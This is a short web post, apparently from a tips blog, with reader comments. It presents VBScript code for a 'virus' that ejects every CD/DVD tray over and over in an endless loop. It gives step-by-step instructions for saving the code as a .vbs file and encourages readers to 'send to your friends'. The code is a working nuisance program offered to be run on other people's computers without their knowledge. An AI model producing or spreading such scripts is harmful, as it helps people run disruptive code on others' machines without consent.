Check out the Latest Articles:

Here is a small and easy way to make your own virus that make your CD/DVD-rom tray totally mad!

What you need to do is simply open notepad

Start -> Run -> notepad

and then paste the following code:

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

Once done, save the notepad file with any name you like but with a .vbs extension. For example: CDromMadness.vbs

Run it or send to your friends :P

You can end the madness by going to task manager and end the process of wscript.exe



  1. ISRAR (Reply) on Saturday 7, 2009

    NEED HELP????
    itz not working

  2. mshabaz (Reply) on Saturday 7, 2009

    Its working. Try copying and pasting exactly. :)